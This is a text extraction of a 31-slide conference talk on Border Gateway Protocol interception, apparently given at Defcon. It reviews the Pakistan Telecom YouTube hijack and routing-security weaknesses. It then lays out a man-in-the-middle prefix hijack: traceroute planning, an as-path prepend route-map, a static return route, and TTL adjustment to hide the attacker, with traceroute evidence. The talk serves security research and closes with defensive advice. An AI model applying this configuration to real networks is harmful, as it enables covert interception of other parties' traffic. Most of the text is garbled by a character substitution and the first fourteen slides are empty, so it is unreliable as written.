8/13/2019 Border Gateway Protocol Interception

1/31

8/13/2019 Border Gateway Protocol Interception

2/31

8/13/2019 Border Gateway Protocol Interception

3/31

8/13/2019 Border Gateway Protocol Interception

4/31

8/13/2019 Border Gateway Protocol Interception

5/31

8/13/2019 Border Gateway Protocol Interception

6/31

8/13/2019 Border Gateway Protocol Interception

7/31

8/13/2019 Border Gateway Protocol Interception

8/31

8/13/2019 Border Gateway Protocol Interception

9/31

8/13/2019 Border Gateway Protocol Interception

10/31

8/13/2019 Border Gateway Protocol Interception

11/31

8/13/2019 Border Gateway Protocol Interception

12/31

8/13/2019 Border Gateway Protocol Interception

13/31

8/13/2019 Border Gateway Protocol Interception

14/31

8/13/2019 Border Gateway Protocol Interception

15/31

0 C0! outu3e (i)ack Saga8 ouTu3e announces 4 /refi"esB

% A C1K, C 0, C , and t9o C s % The C is 0! 64 14 0C8 #akistan:s go$ern'ent decides to 3lock ouTu3e8 #akistan Teleco' internall nails u/ a 'ore s/ecific route

? 0! 64 14 0C @ out of ouTu3e:s C to null0 ?the routers

discard interface@8 So'eho9 redists fro' static 3g/, then to #&&58 H/strea' /ro$ider sends routes to e$er one elseF8 Most of the net no9 goes to #akistan for ouTu3e, gets

nothingO8 ouTu3e res/onds 3 announcing 3oth the C and t9o 'ore

s/ecific C 4s, 9ith /artial success8 #&&5 turns off #akistan Teleco' /eering t9o hours later 8 to 4 'inutes after9ard, glo3al 3g/ ta3le is clean again

8/13/2019 Border Gateway Protocol Interception

16/31

#akistan o$t Notice

8/13/2019 Border Gateway Protocol Interception

17/31

+f InterestFI# (i)acking *o

8 Hn-official e$ent at NAN+ conference8 5e test securit of Internet routing

infrastructure

8 Eecent e"ercisesB %(i)acked 1 0 0 0C!B K0P success %(i)acked 1 6 0 0 0C16B K4P success

% Atte'/ted to announce net9orks longer than CB fro' C 4 do9n to C 9ith coo/eration oflarge &DN:s 0P successful o$erall

8/13/2019 Border Gateway Protocol Interception

18/31

Eouting Securit Is &o'/licated8 No ans9er et, due to lack of chain of trust fro' I&ANN

on do9n8 =5eakest link> /ro3le'B Hntil everyone filters everyone

perfectly , this door is still o/en8 *est /ractice toda is =Alerting> s ste's that look for

rogue announce'ents ?#(AS, EI#G M ASN, Eenes s,etc@

8 Eegister our AS and our /refi" in EIE ?no i''ediateeffect, 3ut e$entuall so'eone 9ill use the'@

8 No anon 'it % if ou hi)ack, e$er one kno9s it:s ou?due to AS-#AT(@

8 If things still 9ork, 9ho co'/lains7

8/13/2019 Border Gateway Protocol Interception

19/31

(o9 To Eesol$e A (i)acking

8 +nce rogue announce'ent isidentified, 9ork 3egins &ontact the

u/strea's and screa' %Ma take 'inutes, hours ?if ou are

outu3e-siQed@, or /ossi3l da s

8 A3out as eas as getting DDoSsto//ed ?or not@

8/13/2019 Border Gateway Protocol Interception

20/31

5hat This Means

8 Eootkits R 0da rogue announce'ents Man-in-'iddle attacks, 9ith our clues a//lied

% No need for three-9a -handshake 9hen ou:re in-line % Nearl in$isi3le e"/loitation /otential, glo3all8 Gnd/oint enu'eration - direct disco$er of 9ho

and 9hat our net9ork talks to

8 &an 3e acco'/lished glo3all , an -to-an8 (o9 9ould ou kno9 if this isn:t ha//ening right

no9 to our traffic at DG &+N7

8/13/2019 Border Gateway Protocol Interception

21/31

* # MITM (i)ack &once/t

8 5e originate the route like 9e al9a s did % 5in through usual 'eans ?/refi" length, shorter as-

/ath 9C se$eral origin /oints, etc@8

=5in> is so'e definition of ='ost of the internet choosesour route>

8 5e return the /ackets so'eho9 % &oordinating deli$er 9as non-tri$ial

% V/nCtunnel in$ol$e untena3le coordination at target8 Then it clicked % use the Internet itself as re/l

/ath, 3ut ho97

8/13/2019 Border Gateway Protocol Interception

22/31

* # MITM Setu/

1 Traceroute ; /lan re/l /ath to targetNote the ASN:s seen to9ards target fro'

traceroute ; 3g/ ta3le on our router A//l as-/ath /re/ends na'ing each of

the ASN:s intended for re/l /ath

Nail u/ static routes to9ards the ne"t-ho/ of the first AS in re/l /ath4 Done

8/13/2019 Border Gateway Protocol Interception

23/31

* # MITM % irst +3ser$e

Eando' Hser ASN 100

Target ASN 00

AS 0

AS10

AS 0

AS60

AS 0

AS40

ASN 00 originates10 10 0 0C , sends

announce'ents to AS 0and AS 0

Internet is con$erged

to9ards $alid route

Vie9 of or9ardingInfor'ation *ase ? I*@ for

10 10 0 0C aftercon$erging

8/13/2019 Border Gateway Protocol Interception

24/31

* # MITM % #lan re/l /ath

Attacker ASN 100

Target ASN 00

AS 0

AS10

AS 0

AS60

AS 0

AS40

ASN 100:s I* sho9s route for10 10 00 0C $ia AS10

5e then 3uild our as-/ath /re/end list toinclude AS 10, 0, and 00

8/13/2019 Border Gateway Protocol Interception

25/31

* # MITM % Setu/ Eoutes

Attacker ASN 100

Target ASN 00

AS 0

AS10

AS 0

AS60

AS 0

AS40

10 10 0 0C is announced 9ith a route-'a/B

route-map hijacked permit 10 match ip address prefix-list jacked set as-path prepend 10 20 200

Then, install static route in AS100 for10 10 0 0C to AS10:s linkip route 10.10.220.0 255.255.255.0 4.3.2.1

8/13/2019 Border Gateway Protocol Interception

26/31

Anon 'Qing The (i)acker

8 5e ad)ust TTL of /ackets in transit8 Gffecti$el

8/13/2019 Border Gateway Protocol Interception

27/31

5ithout TTL ad)ust'ent

2 12.87.94.9 !" 7018# 4 msec 4 msec 8 msec

3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 4 msec 4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 8 msec 4 msec 8 msec 5 192.205.35.42 !" 7018# 4 msec 8 msec 4 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 24 msec 1( msec 28 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 28 msec 28 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 28 msec 32 msec 32 msec 10 colo-(9-31-40-107.pilosoft.com &(9.31.40.107' !" 2((27# 32 msec 28 msec 28 msec 11 t%e2-3-103.ar1.n c3.us.nla er.net &(9.31.95.97' !" 443(# 32 msec 32 msec 32 msec 12 &missin% from trace/ 198.32.1(0.134 exchan%e point' 13 t%e1-2.fr4.ord.lln+.net &(9.28.171.193' !" 22822# 32 msec 32 msec 40 msec 14 )e(.fr3.ord.lln+.net &(9.28.172.41' !" 22822# 3( msec 32 msec 40 msec 15 t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# 84 msec 84 msec 84 msec 1( )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 9( msec 9( msec 80 msec 17 t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# 88 msec 92 msec 92 msec 18 t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# 9( msec 9( msec 100 msec 19 s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# 84 msec 88 msec 88 msec 20 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 84 msec 88 msec 88 msec 21 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec 22 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 88 msec 88 msec 88 msec 23 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 84 msec 84 msec

8/13/2019 Border Gateway Protocol Interception

28/31

5ith TTL Ad)ust'ents

2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec 3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec 4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 5 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec 10 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec 11 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec

12 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec 13 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec

8/13/2019 Border Gateway Protocol Interception

29/31

&o'/are +riginal * # ; Eoute #ath

ijacked

2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec 3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec

4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 5 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec 10 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec 11 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec 12 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec 13 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec

ri%inal

2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec

3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 8 msec 8 msec 8 msec 4 12.122.99.17 !" 7018# 8 msec 4 msec 8 msec 5 12.8(.15(.10 !" 7018# 12 msec 8 msec 4 msec ( t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# (8 msec 5( msec (8 msec 7 )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 5( msec (8 msec 5( msec 8 t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# (4 msec (4 msec 72 msec 9 t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# (8 msec 72 msec 72 msec 10 s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# (0 msec (0 msec (0 msec 11 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# (0 msec (0 msec (0 msec

12 ((.209.(4.85 !" 23005# (4 msec (0 msec (0 msec 13 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# (0 msec (4 msec (0 msec 14 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# (0 msec (0 msec (0 msec

8/13/2019 Border Gateway Protocol Interception

30/31

In conclusion

8 5e learned that an ar3itrar /refi" can 3ehi)acked, 9ithout 3reaking end-to-end

8 5e sa9 it can ha//en nearl in$isi3l8 5e noted the * # as-/ath does re$eal

the attacker 8

Shields u/ filter our custo'ers

8/13/2019 Border Gateway Protocol Interception

31/31

Thanks ; #raise

8 eli" Lindner 8 Ua *eale

8 Dan 2a'insk8 Defcon S/eaker oons ; Staff 8 Todd Hnder9ood